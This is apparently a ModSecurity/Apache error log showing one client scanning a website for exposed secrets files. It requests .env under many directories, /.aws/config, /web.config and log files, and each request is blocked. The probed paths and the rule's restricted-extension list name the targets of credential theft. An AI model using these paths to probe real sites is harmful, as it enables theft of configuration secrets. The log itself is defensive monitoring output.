[Sat Nov 29 05:39:50.681249 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aSp5FkEtJ9CmhQWZAbNCYAAAAAI"]
[Sat Nov 29 05:39:50.681473 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aSp5FkEtJ9CmhQWZAbNCYAAAAAI"]
[Sat Nov 29 05:39:50.681714 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aSp5FkEtJ9CmhQWZAbNCYAAAAAI"]
[Sat Nov 29 05:39:51.101891 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aSp5F_f8q--fJYmSMAuGAwAAAAk"]
[Sat Nov 29 05:39:51.102145 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aSp5F_f8q--fJYmSMAuGAwAAAAk"]
[Sat Nov 29 05:39:51.102391 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aSp5F_f8q--fJYmSMAuGAwAAAAk"]
[Sat Nov 29 05:39:51.328844 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aSp5F0EtJ9CmhQWZAbNCYQAAAAI"]
[Sat Nov 29 05:39:51.330116 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aSp5F0EtJ9CmhQWZAbNCYQAAAAI"]
[Sat Nov 29 05:39:51.330415 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aSp5F0EtJ9CmhQWZAbNCYQAAAAI"]
[Sat Nov 29 05:39:51.331207 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aSp5F9zvgQgSrnIGPhRUhgAAAAo"]
[Sat Nov 29 05:39:51.331426 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aSp5F9zvgQgSrnIGPhRUhgAAAAo"]
[Sat Nov 29 05:39:51.331586 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aSp5F9zvgQgSrnIGPhRUhgAAAAo"]
[Sat Nov 29 05:39:51.683519 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/tools/.env"] [unique_id "aSp5F_f8q--fJYmSMAuGBAAAAAk"]
[Sat Nov 29 05:39:51.683739 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/tools/.env"] [unique_id "aSp5F_f8q--fJYmSMAuGBAAAAAk"]
[Sat Nov 29 05:39:51.683957 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/tools/.env"] [unique_id "aSp5F_f8q--fJYmSMAuGBAAAAAk"]
[Sat Nov 29 05:39:52.157205 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/v2/.env"] [unique_id "aSp5GNzvgQgSrnIGPhRUhwAAAAo"]
[Sat Nov 29 05:39:52.157438 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/v2/.env"] [unique_id "aSp5GNzvgQgSrnIGPhRUhwAAAAo"]
[Sat Nov 29 05:39:52.157640 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/v2/.env"] [unique_id "aSp5GNzvgQgSrnIGPhRUhwAAAAo"]
[Sat Nov 29 05:39:52.350446 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kubernetes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/kubernetes/.env"] [unique_id "aSp5GPf8q--fJYmSMAuGBQAAAAk"]
[Sat Nov 29 05:39:52.350665 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/kubernetes/.env"] [unique_id "aSp5GPf8q--fJYmSMAuGBQAAAAk"]
[Sat Nov 29 05:39:52.350866 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/kubernetes/.env"] [unique_id "aSp5GPf8q--fJYmSMAuGBQAAAAk"]
[Sat Nov 29 05:39:52.910493 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/web.config"] [unique_id "aSp5GPf8q--fJYmSMAuGBgAAAAk"]
[Sat Nov 29 05:39:52.910683 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/web.config"] [unique_id "aSp5GPf8q--fJYmSMAuGBgAAAAk"]
[Sat Nov 29 05:39:52.910911 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/web.config"] [unique_id "aSp5GPf8q--fJYmSMAuGBgAAAAk"]
[Sat Nov 29 05:39:52.911144 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/web.config"] [unique_id "aSp5GPf8q--fJYmSMAuGBgAAAAk"]
[Sat Nov 29 05:39:54.474504 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/config"] [unique_id "aSp5Gvf8q--fJYmSMAuGCAAAAAk"]
[Sat Nov 29 05:39:54.474728 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/config"] [unique_id "aSp5Gvf8q--fJYmSMAuGCAAAAAk"]
[Sat Nov 29 05:39:54.475005 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/config"] [unique_id "aSp5Gvf8q--fJYmSMAuGCAAAAAk"]
[Sat Nov 29 05:39:58.435981 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/debug.log"] [unique_id "aSp5HkEtJ9CmhQWZAbNCaAAAAAI"]
[Sat Nov 29 05:39:58.436304 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/debug.log"] [unique_id "aSp5HkEtJ9CmhQWZAbNCaAAAAAI"]
[Sat Nov 29 05:39:58.436489 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/debug.log"] [unique_id "aSp5HkEtJ9CmhQWZAbNCaAAAAAI"]
[Sat Nov 29 05:39:58.806749 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/errors.log"] [unique_id "aSp5Hvf8q--fJYmSMAuGDAAAAAk"]
[Sat Nov 29 05:39:58.807110 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/errors.log"] [unique_id "aSp5Hvf8q--fJYmSMAuGDAAAAAk"]
[Sat Nov 29 05:39:58.807340 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/errors.log"] [unique_id "aSp5Hvf8q--fJYmSMAuGDAAAAAk"]
[Sat Nov 29 05:39:59.311869 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/sitemaps/.env"] [unique_id "aSp5H_f8q--fJYmSMAuGDQAAAAk"]
[Sat Nov 29 05:39:59.312086 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/sitemaps/.env"] [unique_id "aSp5H_f8q--fJYmSMAuGDQAAAAk"]
[Sat Nov 29 05:39:59.312292 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/sitemaps/.env"] [unique_id "aSp5H_f8q--fJYmSMAuGDQAAAAk"]
[Sat Nov 29 05:39:59.528829 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/exapi/.env"] [unique_id "aSp5H0EtJ9CmhQWZAbNCaQAAAAI"]
